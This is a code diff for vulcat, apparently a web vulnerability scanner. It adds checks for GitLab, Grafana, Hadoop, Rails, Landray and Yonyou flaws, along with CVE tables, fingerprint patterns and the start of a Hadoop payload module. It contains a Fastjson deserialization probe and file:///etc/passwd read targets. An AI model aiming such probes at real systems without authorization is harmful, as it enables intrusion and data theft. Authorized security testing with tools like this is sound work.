+| Fastjson | CNVD-2019-22238 | unSerialize | Fastjson <=1.2.47 deSerialization |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Gitea | None | unAuth | Gitea 1.4.0 unAuthorized |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Gitlab | CVE-2021-22205 | RCE | GitLab Pre-Auth Remote code execution |
+| Gitlab | CVE-2021-22214 | SSRF | Gitlab CI Lint API SSRF |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Grafana | CVE-2021-43798 | FileRead | Grafana 8.x Directory traversal |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Jenkins | CVE-2018-1000861 | RCE | jenkins Remote code execution |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Keycloak | CVE-2020-10770 | SSRF | request_uri SSRF |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Landray | CNVD-2021-28277 | FileRead/SSRF| Landray-OA FileRead/SSRF |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| mongo-express | CVE-2019-10758 | RCE | Remote code execution |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Nodejs | CVE-2017-14849 | FileRead | Node.js Directory traversal |
+| Nodejs | CVE-2021-21315 | RCE | Node.js Remote code execution |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| NodeRED | CVE-2021-3223 | FileRead | Node-RED Directory traversal |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Ruby on Rails | CVE-2018-3760 | FileRead | Ruby on Rails Directory traversal |
+| Ruby on Rails | CVE-2019-5418 | FileRead | Ruby on Rails FileRead |
+| Ruby on Rails | CVE-2020-8163 | RCE | Ruby on Rails Remote code execution |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| ShowDoc | CNVD-2020-26585 | FileUpload | ShowDoc writes to any file |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Spring | CVE-2020-5410 | FileRead | Spring Cloud Directory traversal |
+| Spring | CVE-2021-21234 | FileRead | Spring Boot Directory traversal |
+| Spring | CVE-2022-22947 | RCE | Spring Cloud Gateway SpEl Remote code execution |
+| Spring | CVE-2022-22963 | RCE | Spring Cloud Function SpEL Remote code execution |
+| Spring | CVE-2022-22965 | RCE | Spring Framework Remote code execution |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| ThinkPHP | CVE-2018-1002015 | RCE | ThinkPHP5.x Remote code execution |
+| ThinkPHP | CNVD-2018-24942 | RCE | The forced route is not enabled Remote code execution |
+| ThinkPHP | CNNVD-201901-445 | RCE | Core class Request Remote code execution |
+| ThinkPHP | None | RCE | ThinkPHP2.x Remote code execution |
+| ThinkPHP | None | SQLinject | ThinkPHP5 ids SQLinject |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Ueditor | None | SSRF | Ueditor SSRF |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Oracle Weblogic | CVE-2014-4210 | SSRF | Weblogic SSRF |
+| Oracle Weblogic | CVE-2017-10271 | unSerialize | Weblogic XMLDecoder deSerialization |
+| Oracle Weblogic | CVE-2019-2725 | unSerialize | Weblogic wls9_async deSerialization |
+| Oracle Weblogic | CVE-2020-14750 | unAuth | Weblogic Authentication bypass |
+| Oracle Weblogic | CVE-2020-14882 | RCE | Weblogic Unauthorized command execution |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Webmin | CVE-2019-15107 | RCE | Webmin Pre-Auth Remote code execution |
+| Webmin | CVE-2019-15642 | RCE | Webmin Remote code execution |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Yonyou | CNNVD-201610-923 | SQLinject | Yonyou-GRP-U8 Proxy SQLinject |
+| Yonyou | CNVD-2021-30167 | RCE | Yonyou-NC BeanShell Remote code execution |
+| Yonyou | None | FileRead | Yonyou-ERP-NC NCFindWeb Directory traversal |
+| Yonyou | None | DSinfo | Yonyou-U8-OA getSessionList.jsp Disclosure information |
+| Yonyou | None | SQLinject | Yonyou-U8-OA test.jsp SQLinject |
++----------------------+--------------------+--------------+------------------------------------------------------------+
```
</details>
diff --git a/lib/core/coreScan.py b/lib/core/coreScan.py
index 86d8fe2..7aec2f7 100644
--- a/lib/core/coreScan.py
+++ b/lib/core/coreScan.py
@@ -28,12 +28,18 @@
from payloads.ElasticSearch import elasticsearch
from payloads.F5BIGIP import f5bigip
from payloads.Fastjson import fastjson
+from payloads.Gitea import gitea
+from payloads.Gitlab import gitlab
+from payloads.Grafana import grafana
+from payloads.ApacheHadoop import hadoop
from payloads.Jenkins import jenkins
from payloads.Keycloak import keycloak
# from payloads.Kindeditor import kindeditor
+from payloads.Landray import landray
from payloads.MongoExpress import mongoexpress
from payloads.Nodejs import nodejs
from payloads.NodeRED import nodered
+from payloads.RubyOnRails import rails
from payloads.ShowDoc import showdoc
from payloads.Spring import spring
from payloads.ThinkPHP import thinkphp
diff --git a/lib/initial/config.py b/lib/initial/config.py
index 5c8fd94..aec9184 100644
--- a/lib/initial/config.py
+++ b/lib/initial/config.py
@@ -87,11 +87,16 @@ def __init__(self, args):
'discuz', 'django', 'drupal',
'elasticsearch',
'f5bigip', 'fastjson', 'flink',
+ # 'gitea', 'gitlab', 'grafana',
+ 'gitea', 'gitlab',
+ 'hadoop',
'jenkins',
# 'keycloak', 'kindeditor',
'keycloak',
+ 'landray',
'mongoexpress',
- 'nacos', 'nodered', 'nodejs',
+ 'nacos', 'nodejs', 'nodered',
+ 'rails',
'showdoc', 'solr', 'struts2', 'spring',
'thinkphp', 'tomcat',
'ueditor',
diff --git a/lib/initial/language.py b/lib/initial/language.py
index d9054e1..d21eefb 100644
--- a/lib/initial/language.py
+++ b/lib/initial/language.py
@@ -62,7 +62,7 @@ def language():
},
'app_list_help': {
'title': 'Supported target types(Case insensitive)',
- 'name': 'AliDruid,nacos,airflow,apisix,flink,solr,struts2,tomcat,appweb,confluence,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,jenkins,keycloak,mongoexpress,nodejs,nodered,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou'
+ 'name': 'AliDruid,nacos,airflow,apisix,flink,hadoop,solr,struts2,tomcat,appweb,confluence,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,gitea,gitlab,grafana,jenkins,keycloak,landray,mongoexpress,nodejs,nodered,rails,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou'
},
'core': {
'start': {
@@ -177,7 +177,7 @@ def language():
},
'app_list_help': {
'title': '支持的目标类型(-a参数, 不区分大小写)',
- 'name': 'AliDruid,nacos,airflow,apisix,flink,solr,struts2,tomcat,appweb,confluence,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,jenkins,keycloak,mongoexpress,nodejs,nodered,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou'
+ 'name': 'AliDruid,nacos,airflow,apisix,flink,hadoop,solr,struts2,tomcat,appweb,confluence,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,gitea,gitlab,grafana,jenkins,keycloak,landray,mongoexpress,nodejs,nodered,rails,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou'
},
'core': {
'start': {
diff --git a/lib/initial/list.py b/lib/initial/list.py
index e9e3709..9311be5 100644
--- a/lib/initial/list.py
+++ b/lib/initial/list.py
@@ -8,7 +8,7 @@ def list():
''' 显示漏洞列表 '''
vul_num = 0
vul_list = ''
- vul_list += '+' + ('-'*22) + '+' + ('-'*20) + '+' + ('-'*14) + '+' + ('-'*10) + '+' + ('-'*73) + '+\n'
+ vul_list += '+' + ('-'*22) + '+' + ('-'*20) + '+' + ('-'*14) + '+' + ('-'*68) + '+\n'
for vul in vul_info:
for info in vul_info[vul]:
@@ -16,10 +16,9 @@ def list():
vul_list += '| {}|'.format(vul.ljust(21))
vul_list += ' {}|'.format(info['vul_id'].ljust(19))
vul_list += ' {}|'.format(info['type'].ljust(13))
- vul_list += ' {}|'.format(info['method'].ljust(9))
- vul_list += ' {}\t|'.format(info['description'].ljust(62))
+ vul_list += ' {}\t|'.format(info['description'].ljust(57))
vul_list += '\n'
- vul_list += '+' + ('-'*22) + '+' + ('-'*20) + '+' + ('-'*14) + '+' + ('-'*10) + '+' + ('-'*73) + '+\n'
+ vul_list += '+' + ('-'*22) + '+' + ('-'*20) + '+' + ('-'*14) + '+' + ('-'*68) + '+\n'
print(color.cyan(vul_list + str(vul_num - 1)))
# print(vul_num)
@@ -30,7 +29,6 @@ def list():
{
'vul_id': 'Vul_id',
'type': 'Type',
- 'method': 'Method',
'description': 'Description\t'
}
],
@@ -38,7 +36,6 @@ def list():
{
'vul_id': 'None',
'type': 'unAuth',
- 'method': 'GET',
'description': '阿里巴巴Druid未授权访问'
}
],
@@ -46,7 +43,6 @@ def list():
{
'vul_id': 'CVE-2021-29441',
'type': 'unAuth',
- 'method': 'GET/POST',
'description': '阿里巴巴Nacos未授权访问'
}
],
@@ -54,7 +50,6 @@ def list():
{
'vul_id': 'CVE-2020-17526',
'type': 'unAuth',
- 'method': 'GET',
'description': 'Airflow身份验证绕过'
}
],
@@ -62,7 +57,6 @@ def list():
{
'vul_id': 'CVE-2020-13945',
'type': 'unAuth',
- 'method': 'GET',
'description': 'Apache APISIX默认密钥'
}
],
@@ -70,15 +64,20 @@ def list():
{
'vul_id': 'CVE-2020-17519',
'type': 'FileRead',
- 'method': 'GET',
'description': 'Flink目录遍历'
}
],
+ 'Apache Hadoop': [
+ {
+ 'vul_id': 'None',
+ 'type': 'unAuth',
+ 'description': 'Hadoop YARN ResourceManager 未授权访问'
+ }
+ ],
'Apache Solr': [
{
'vul_id': 'CVE-2021-27905',
'type': 'SSRF',
- 'method': 'GET/POST',
'description': 'Solr SSRF/任意文件读取'
}
],
@@ -86,37 +85,31 @@ def list():
{
'vul_id': 'S2-001',
'type': 'RCE',
- 'method': 'POST',
'description': 'Struts2远程代码执行'
},
{
'vul_id': 'S2-005',
'type': 'RCE',
- 'method': 'GET',
'description': 'Struts2远程代码执行'
},
{
'vul_id': 'S2-007',
'type': 'RCE',
- 'method': 'GET',
'description': 'Struts2远程代码执行'
},
{
'vul_id': 'S2-008',
'type': 'RCE',
- 'method': 'GET',
'description': 'Struts2远程代码执行'
},
{
'vul_id': 'S2-009',
'type': 'RCE',
- 'method': 'GET',
'description': 'Struts2远程代码执行'
},
{
'vul_id': 'S2-012',
'type': 'RCE',
- 'method': 'GET',
'description': 'Struts2远程代码执行'
}
],
@@ -124,7 +117,6 @@ def list():
{
'vul_id': 'CVE-2017-12615',
'type': 'FileUpload',
- 'method': 'PUT',
'description': 'PUT方法任意文件写入'
}
],
@@ -132,7 +124,6 @@ def list():
{
'vul_id': 'CVE-2018-8715',
'type': 'unAuth',
- 'method': 'GET',
'description': 'AppWeb身份认证绕过'
}
],
@@ -140,25 +131,21 @@ def list():
{
'vul_id': 'CVE-2015-8399',
'type': 'FileRead',
- 'method': 'GET',
'description': 'Confluence任意文件包含'
},
{
'vul_id': 'CVE-2019-3396',
'type': 'RCE/FileRead',
- 'method': 'POST',
'description': 'Confluence路径遍历和命令执行'
},
{
'vul_id': 'CVE-2021-26084',
'type': 'RCE',
- 'method': 'POST',
'description': 'Confluence Webwork Pre-Auth OGNL表达式命令注入'
},
{
'vul_id': 'CVE-2022-26134',
'type': 'RCE',
- 'method': 'GET',
'description': 'Confluence远程代码执行'
}
],
@@ -166,7 +153,6 @@ def list():
{
'vul_id': 'CVE-2020-3580',
'type': 'XSS',
- 'method': 'POST',
'description': '思科ASA/FTD XSS跨站脚本攻击'
}
],
@@ -174,7 +160,6 @@ def list():
{
'vul_id': 'wooyun-2010-080723',
'type': 'RCE',
- 'method': 'GET',
'description': '全局变量防御绕过RCE'
}
],
@@ -182,31 +167,26 @@ def list():
{
'vul_id': 'CVE-2017-12794',
'type': 'XSS',
- 'method': 'GET',
'description': 'debug page XSS跨站脚本攻击'
},
{
'vul_id': 'CVE-2018-14574',
'type': 'Redirect',
- 'method': 'GET',
'description': 'CommonMiddleware url重定向'
},
{
'vul_id': 'CVE-2019-14234',
'type': 'SQLinject',
- 'method': 'GET',
'description': 'JSONfield SQL注入'
},
{
'vul_id': 'CVE-2020-9402',
'type': 'SQLinject',
- 'method': 'GET',
'description': 'GIS SQL注入'
},
{
'vul_id': 'CVE-2021-35042',
'type': 'SQLinject',
- 'method': 'GET',
'description': 'QuerySet.order_by SQL注入'
}
],
@@ -214,25 +194,21 @@ def list():
{
'vul_id': 'CVE-2014-3704',
'type': 'SQLinject',
- 'method': 'POST',
'description': 'Drupal < 7.32 Drupalgeddon SQL 注入'
},
{
'vul_id': 'CVE-2017-6920',
'type': 'RCE',
- 'method': 'POST',
'description': 'Drupal Core 8 PECL YAML 反序列化代码执行'
},
{
'vul_id': 'CVE-2018-7600',
'type': 'RCE',
- 'method': 'POST',
'description': 'Drupal Drupalgeddon 2 远程代码执行'
},
{
'vul_id': 'CVE-2018-7602',
'type': 'RCE',
- 'method': 'POST',
'description': 'Drupal 远程代码执行'
}
],
@@ -240,25 +216,21 @@ def list():
{
'vul_id': 'CVE-2014-3120',
'type': 'RCE',
- 'method': 'POST',
'description': 'ElasticSearch命令执行'
},
{
'vul_id': 'CVE-2015-1427',
'type': 'RCE',
- 'method': 'POST',
'description': 'ElasticSearch Groovy 沙盒绕过&&代码执行'
},
{
'vul_id': 'CVE-2015-3337',
'type': 'FileRead',
- 'method': 'GET',
'description': 'ElasticSearch 目录穿越'
},
{
'vul_id': 'CVE-2015-5531',
'type': 'FileRead',
- 'method': 'PUT/GET',
'description': 'ElasticSearch 目录穿越'
},
],
@@ -266,13 +238,11 @@ def list():
{
'vul_id': 'CVE-2020-5902',
'type': 'RCE',
- 'method': 'GET',
'description': 'BIG-IP远程代码执行'
},
{
'vul_id': 'CVE-2022-1388',
'type': 'unAuth',
- 'method': 'POST',
'description': 'BIG-IP身份认证绕过'
}
],
@@ -280,21 +250,44 @@ def list():
{
'vul_id': 'CNVD-2017-02833',
'type': 'unSerialize',
- 'method': 'POST',
'description': 'Fastjson <= 1.2.24 反序列化'
},
{
'vul_id': 'CNVD-2019-22238',
'type': 'unSerialize',
- 'method': 'POST',
'description': 'Fastjson <= 1.2.47 反序列化'
}
],
+ 'Gitea': [
+ {
+ 'vul_id': 'None',
+ 'type': 'unAuth',
+ 'description': 'Gitea 1.4.0 未授权访问'
+ },
+ ],
+ 'Gitlab': [
+ {
+ 'vul_id': 'CVE-2021-22205',
+ 'type': 'RCE',
+ 'description': 'GitLab Pre-Auth 远程命令执行'
+ },
+ {
+ 'vul_id': 'CVE-2021-22214',
+ 'type': 'SSRF',
+ 'description': 'Gitlab CI Lint API未授权 SSRF'
+ }
+ ],
+ 'Grafana': [
+ {
+ 'vul_id': 'CVE-2021-43798',
+ 'type': 'FileRead',
+ 'description': 'Grafana 8.x 插件模块路径遍历'
+ },
+ ],
'Jenkins': [
{
'vul_id': 'CVE-2018-1000861',
'type': 'RCE',
- 'method': 'POST',
'description': 'jenkins 远程命令执行'
}
],
@@ -302,7 +295,6 @@ def list():
{
'vul_id': 'CVE-2020-10770',
'type': 'SSRF',
- 'method': 'GET',
'description': '使用request_uri调用未经验证的URL'
}
],
@@ -314,11 +306,17 @@ def list():
# 'description': 'Kindeditor 目录遍历'
# }
# ],
+ 'Landray': [
+ {
+ 'vul_id': 'CNVD-2021-28277',
+ 'type': 'FileRead/SSRF',
+ 'description': '蓝凌OA 任意文件读取/SSRF'
+ }
+ ],
'mongo-express': [
{
'vul_id': 'CVE-2019-10758',
'type': 'RCE',
- 'method': 'POST',
'description': '未授权远程代码执行'
}
],
@@ -326,13 +324,11 @@ def list():
{
'vul_id': 'CVE-2017-14849',
'type': 'FileRead',
- 'method': 'GET',
'description': 'Node.js目录穿越'
},
{
'vul_id': 'CVE-2021-21315',
'type': 'RCE',
- 'method': 'GET',
'description': 'Node.js命令执行'
}
],
@@ -340,15 +336,30 @@ def list():
{
'vul_id': 'CVE-2021-3223',
'type': 'FileRead',
- 'method': 'GET',
'description': 'Node-RED 任意文件读取'
}
],
+ 'Ruby on Rails': [
+ {
+ 'vul_id': 'CVE-2018-3760',
+ 'type': 'FileRead',
+ 'description': 'Ruby on Rails 路径遍历'
+ },
+ {
+ 'vul_id': 'CVE-2019-5418',
+ 'type': 'FileRead',
+ 'description': 'Ruby on Rails 任意文件读取'
+ },
+ {
+ 'vul_id': 'CVE-2020-8163',
+ 'type': 'RCE',
+ 'description': 'Ruby on Rails 命令执行'
+ }
+ ],
'ShowDoc': [
{
'vul_id': 'CNVD-2020-26585',
'type': 'FileUpload',
- 'method': 'POST',
'description': 'ShowDoc 任意文件上传'
}
],
@@ -356,31 +367,26 @@ def list():
{
'vul_id': 'CVE-2020-5410',
'type': 'FileRead',
- 'method': 'GET',
'description': 'Spring Cloud目录遍历'
},
{
'vul_id': 'CVE-2021-21234',
'type': 'FileRead',
- 'method': 'GET',
'description': 'Spring Boot目录遍历'
},
{
'vul_id': 'CVE-2022-22947',
'type': 'RCE',
- 'method': 'POST',
'description': 'Spring Cloud Gateway SpEl远程代码执行'
},
{
'vul_id': 'CVE-2022-22963',
'type': 'RCE',
- 'method': 'POST',
'description': 'Spring Cloud Function SpEL远程代码执行'
},
{
'vul_id': 'CVE-2022-22965',
'type': 'RCE',
- 'method': 'GET/POST',
'description': 'Spring Framework远程代码执行'
}
],
@@ -388,31 +394,26 @@ def list():
{
'vul_id': 'CVE-2018-1002015',
'type': 'RCE',
- 'method': 'GET',
'description': 'ThinkPHP5.x 远程代码执行'
},
{
'vul_id': 'CNVD-2018-24942',
'type': 'RCE',
- 'method': 'GET',
'description': '未开启强制路由导致RCE'
},
{
'vul_id': 'CNNVD-201901-445',
'type': 'RCE',
- 'method': 'POST',
'description': '核心类Request远程代码执行'
},
{
'vul_id': 'None',
'type': 'RCE',
- 'method': 'GET',
'description': 'ThinkPHP2.x 远程代码执行'
},
{
'vul_id': 'None',
'type': 'SQLinject',
- 'method': 'GET',
'description': 'ThinkPHP5 ids参数SQL注入'
}
],
@@ -420,7 +421,6 @@ def list():
{
'vul_id': 'None',
'type': 'SSRF',
- 'method': 'GET',
'description': 'Ueditor编辑器SSRF'
}
],
@@ -428,31 +428,26 @@ def list():
{
'vul_id': 'CVE-2014-4210',
'type': 'SSRF',
- 'method': 'GET',
'description': 'Weblogic 服务端请求伪造'
},
{
'vul_id': 'CVE-2017-10271',
'type': 'unSerialize',
- 'method': 'POST',
'description': 'Weblogic XMLDecoder反序列化'
},
{
'vul_id': 'CVE-2019-2725',
'type': 'unSerialize',
- 'method': 'POST',
'description': 'Weblogic wls9_async反序列化'
},
{
'vul_id': 'CVE-2020-14750',
'type': 'unAuth',
- 'method': 'GET',
'description': 'Weblogic 权限验证绕过'
},
{
'vul_id': 'CVE-2020-14882',
'type': 'RCE',
- 'method': 'GET',
'description': 'Weblogic 未授权命令执行'
}
],
@@ -460,28 +455,39 @@ def list():
{
'vul_id': 'CVE-2019-15107',
'type': 'RCE',
- 'method': 'POST',
'description': 'Webmin Pre-Auth 远程代码执行'
},
{
'vul_id': 'CVE-2019-15642',
'type': 'RCE',
- 'method': 'POST',
'description': 'Webmin 远程代码执行'
}
],
'Yonyou': [
+ {
+ 'vul_id': 'CNNVD-201610-923',
+ 'type': 'SQLinject',
+ 'description': '用友GRP-U8 Proxy SQL注入'
+ },
{
'vul_id': 'CNVD-2021-30167',
'type': 'RCE',
- 'method': 'GET',
'description': '用友NC BeanShell远程命令执行'
},
{
'vul_id': 'None',
'type': 'FileRead',
- 'method': 'GET',
'description': '用友ERP-NC NCFindWeb目录遍历'
+ },
+ {
+ 'vul_id': 'None',
+ 'type': 'DSinfo',
+ 'description': '用友U8 OA getSessionList.jsp 敏感信息泄漏'
+ },
+ {
+ 'vul_id': 'None',
+ 'type': 'SQLinject',
+ 'description': '用友U8 OA test.jsp SQL注入'
}
]
}
diff --git a/lib/initial/parse.py b/lib/initial/parse.py
index 5bf0348..6e4a82f 100644
--- a/lib/initial/parse.py
+++ b/lib/initial/parse.py
@@ -19,7 +19,7 @@ def parse():
python3 vulcat.py -u https://www.example.com/ -a tomcat -v CVE-2017-12615
python3 vulcat.py -f url.txt -t 10
python3 vulcat.py --list
-''', version='vulcat.py-1.1.1\n')
+''', version='vulcat.py-1.1.2\n')
# * 指定目标
target = parser.add_option_group(lang['target_help']['title'], lang['target_help']['name'])
target.add_option('-u', '--url', type='string', dest='url', default=None, help=lang['target_help']['url'])
@@ -55,7 +55,6 @@ def parse():
general = parser.add_option_group(lang['general_help']['title'], lang['general_help']['name'])
general.add_option('--no-waf', dest='no_waf', action='store_true', help=lang['general_help']['no_waf'])
general.add_option('--no-poc', dest='no_poc', action='store_true', help=lang['general_help']['no_poc'])
- # general.add_option('--no-webapp', dest='no_webapp', action='store_true', help='')
general.add_option('--batch', dest='batch', action='store_true', help=lang['general_help']['batch'])
# * 查看漏洞列表
diff --git a/lib/plugins/fingerprint/webapp.py b/lib/plugins/fingerprint/webapp.py
index 8a92d33..346e528 100644
--- a/lib/plugins/fingerprint/webapp.py
+++ b/lib/plugins/fingerprint/webapp.py
@@ -293,6 +293,64 @@ def __init__(self):
r'JSON parse error: set property error, autoCommit;'
]
},
+ {
+ 'name': 'fastjson',
+ 'path': '',
+ 'data': '{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"abcd","autoCommit":true}}',
+ 'fingerprint': [
+ r'com\.alibaba\.fastjson\.JSONException:',
+ r'JSON parse error: set property error, autoCommit;'
+ ]
+ },
+ {
+ 'name': 'gitea',
+ 'path': '',
+ 'data': '',
+ 'fingerprint': [
+ r'<title>.* - Gitea: Git with a cup of tea</title>',
+ r'Copyright (c) .* The Gitea Authors',
+ r'Gitea 当前版本: .* 页面: <strong>\d*ms</strong> 模板: <strong>\d*ms</strong>',
+ r'Go 语言</a> 支持的平台都可以运行 Gitea,包括 Windows、Mac、Linux 以及 ARM。挑一个您喜欢的就行!',
+ r'<p class="large">.*一个廉价的树莓派的配置足以满足 Gitea 的最低系统硬件要求。最大程度上节省您的服务器资源!.*</p>',
+ r'所有的代码都开源在 <a target="_blank" rel="noopener" href="https://github\.com/go-gitea/gitea/">GitHub</a> 上,赶快加入我们来共同发展这个伟大的项目!还等什么?成为贡献者吧!'
+ ]
+ },
+ {
+ 'name': 'gitlab',
+ 'path': '',
+ 'data': '',
+ 'fingerprint': [
+ r'<title>GitLab</title>',
+ r'<meta content="GitLab" property="og:site_name">',
+ r'<meta content="GitLab Community Edition" property="og:description">',
+ r'meta content="GitLab Community Edition" property="twitter:description"',
+ r'meta content="GitLab Community Edition" name="description"',
+ r'<a href="https://about\.gitlab\.com/">About GitLab</a>'
+ ]
+ },
+ {
+ 'name': 'grafana',
+ 'path': '',
+ 'data': '',
+ 'fingerprint': [
+ r'<link rel="mask-icon" href="public/img/grafana_mask_icon\.svg"',
+ r'body class="theme-dark app-grafana',
+ r'public/img/grafana_icon\.svg',
+ r'Loading Grafana.*2\..*grafana.*3\..*4\..*5\.',
+ r'window\.__grafana.*'
+ ]
+ },
+ {
+ 'name': 'hadoop',
+ 'path': '',
+ 'data': '',
+ 'fingerprint': [
+ r'<img src="/static/hadoop-st\.png">',
+ r'<a href="/jmx\?qry=Hadoop:\*">Server metrics</a>',
+ r"'sType':'natural', 'aTargets': \[0\], 'mRender': parseHadoopID",
+ r'<pre>org\.apache\.hadoop\.yarn\.webapp\.WebAppException:'
+ ]
+ },
{
'name': 'jenkins',
'path': '',
@@ -322,6 +380,15 @@ def __init__(self):
# r'KindEditor - WYSIWYG HTML Editor for Internet'
# ]
# },
+ {
+ 'name': 'landray',
+ 'path': '',
+ 'data': '',
+ 'fingerprint': [
+ r'\["sys/ui/extend.{0,50}\.css"\]',
+ r"'lui': 'sys/ui/js'"
+ ]
+ },
{
'name': 'mongoexpress',
'path': '',
@@ -353,6 +420,21 @@ def __init__(self):
r'<title>Node-RED</title>'
]
},
+ {
+ 'name': 'rails',
+ 'path': '',
+ 'data': '',
+ 'fingerprint': [
+ r'<title>Ruby on Rails</title>',
+ r'<h1>Yay! You’re on Rails!</h1>',
+ r'<strong>Rails version:</strong>.*<br />',
+ r'<strong>Ruby version:</strong>.*(.*)',
+ r'<p><code>Rails\.root: .*</code></p>',
+ r'<li>For more information about routes, please see the Rails guide<a href="http://guides\.rubyonrails\.org/routing\.html">Rails Routing from the Outside In</a>\.</li>',
+ r'<title>RailsFileContent</title>',
+ r'<script src="/assets/.{0,30}\.self-.{64}\.js\?body=1" data-turbolinks-track=".{0,10}"></script>'
+ ]
+ },
{
'name': 'showdoc',
'path': '',
@@ -458,7 +540,17 @@ def __init__(self):
'data': '',
'fingerprint': [
r'<div class="footer">版权所有.*用友网络科技股份有限公司.*',
- r'<title>YONYOU NC</title>'
+ r'<title>YONYOU NC</title>',
+ r'//判断操作系统.*\.\./Client/Uclient/UClient\.dmg.*UClient客户端下载',
+ r'<title>用友GRP-U8.*行政事业内控管理软件.*</title>',
+ r'<div class="foot foot1".*>北京用友政务软件有限公司.*</div>',
+ r'<script type="text/javascript" src="/yyoa/seeyonoa/common/js/jquery/jquery\.js"></script>',
+ r'<script type="text/javascript" src="seeyonoa/common/js/popDialog\.jsp"></script>',
+ r'<li class="A6_name"><img src="seeyonoa/ui/images/login/oem_name\.png" /></li>',
+ r'<title>.* 《用友U8\+OA基础版》</title>',
+ r'<title>.* 《用友U8-OA企业版》</title>',
+ r'<li class="copyright"><span>©用友软件珠海研发基地</span></li>',
+ r'<title>.*-FE协作办公平台\d\.\d(\.\d)?</title>'
]
},
# {
diff --git a/lib/report/output.py b/lib/report/output.py
index a0a8b63..561d7e3 100644
--- a/lib/report/output.py
+++ b/lib/report/output.py
@@ -82,7 +82,7 @@ def output_json(results, filename, lang):
# * Response对象不能json化, 转为字符串
for key in result_info.keys():
if type(result_info[key]) == requests.models.Response:
- result_info[key] = output_res(result_info[key], iscolor=False)
+ result_info[key] = output_res(key, result_info[key], iscolor=False)
results_info_list.append(json.dumps(result_info, indent=4) + '\n')
results_info_list = set(results_info_list)
@@ -125,7 +125,7 @@ def output_vul_info_color(result):
result_info += output_dict(key, value)
elif value_type == requests.models.Response: # * Response输出方式
- result_info += output_res(value)
+ result_info += output_res(key, value)
return result_info
@@ -144,7 +144,7 @@ def output_vul_info(result):
result_info += output_dict(key, value, iscolor=False)
elif value_type == requests.models.Response:
- result_info += output_res(value, iscolor=False)
+ result_info += output_res(key, value, iscolor=False)
return result_info
@@ -205,12 +205,13 @@ def output_dict(key, value, iscolor=True):
return info_dict
-def output_res(res, iscolor=True):
+def output_res(key, res, iscolor=True):
''' 接收一个requests结果, 返回一个http数据包 '''
info_res = ''
if iscolor:
try:
+ info_res += color.yellow_ex(key) + ':'
info_res += color.red_ex(' [Request')
info_res += color.black_ex('\n' + res.request.method + ' ' + res.request.path_url + ' ' + http.client.HTTPConnection._http_vsn_str)
info_res += color.black_ex('\n' + 'Host' + ': ' + logger.get_domain(res.request.url))
@@ -218,14 +219,18 @@ def output_res(res, iscolor=True):
for key, value in res.request.headers.items():
info_res += color.black_ex('\n' + key + ': ' + value)
if res.request.body:
- info_res += color.black_ex('\n\n' + res.request.body)
+ if (type(res.request.body) == bytes):
+ info_res += color.black_ex('\n\n' + res.request.body.decode())
+ else:
+ info_res += color.black_ex('\n\n' + res.request.body)
info_res += color.red_ex(']')
- info_res += color.reset('\n')
+ info_res += color.reset('\n ')
except:
return info_res
else:
try:
+ info_res += key + ':'
info_res += ' [Request'
info_res += '\n' + res.request.method + ' ' + res.request.path_url + ' ' + http.client.HTTPConnection._http_vsn_str
info_res += '\n' + 'Host' + ': ' + logger.get_domain(res.request.url)
@@ -233,9 +238,12 @@ def output_res(res, iscolor=True):
for key, value in res.request.headers.items():
info_res += '\n' + key + ': ' + value
if res.request.body:
- info_res += '\n\n' + res.request.body
+ if (type(res.request.body) == bytes):
+ info_res += '\n\n' + res.request.body.decode()
+ else:
+ info_res += '\n\n' + res.request.body
- info_res += ']'
+ info_res += ']\n '
except:
return info_res
diff --git a/lib/tool/logger.py b/lib/tool/logger.py
index 9da38f2..617dda5 100644
--- a/lib/tool/logger.py
+++ b/lib/tool/logger.py
@@ -68,7 +68,10 @@ def logging_4(self, vul_info, status_code, res):
for key, value in res.request.headers.items():
info_4 += color.black_ex('\n' + key + ': ' + value)
if res.request.body:
- info_4 += color.black_ex('\n\n' + res.request.body)
+ if (type(res.request.body) == bytes):
+ info_4 += color.black_ex('\n\n' + res.request.body.decode())
+ else:
+ info_4 += color.black_ex('\n\n' + res.request.body)
info_4 += color.red_ex('\n]')
info_4 += color.reset('')
diff --git a/payloads/ApacheHadoop.py b/payloads/ApacheHadoop.py
new file mode 100644
index 0000000..e9b9532
--- /dev/null
+++ b/payloads/ApacheHadoop.py
@@ -0,0 +1,155 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+
+ Apache Hadoop扫描类:
+ Hadoop YARN ResourceManager 未授权访问
+ 暂无编号
+ Payload: https://vulhub.org/#/environments/hadoop/unauthorized-yarn/
+file:///etc/passwd
+file:///C:\Windows\System32\drivers\etc\hosts
+'''
+
+from lib.api.dns import dns
+from lib.initial.config import config
+from lib.tool.md5 import md5, random_md5
+from lib.tool.logger import logger
+from lib.tool.thread import thread
+from lib.tool import check
+from thirdparty import requests
+from time import sleep
+
+class ApacheHadoop():
+ def __init__(self):
+ self.timeout = config.get('timeout')
+ self.headers = config.get('headers')
+ self.proxies = config.get('proxies')
+
+ self.app_name = 'ApacheHadoop'
+ self.md = md5(self.app_name)
+ self.cmd = 'echo ' + self.md
+
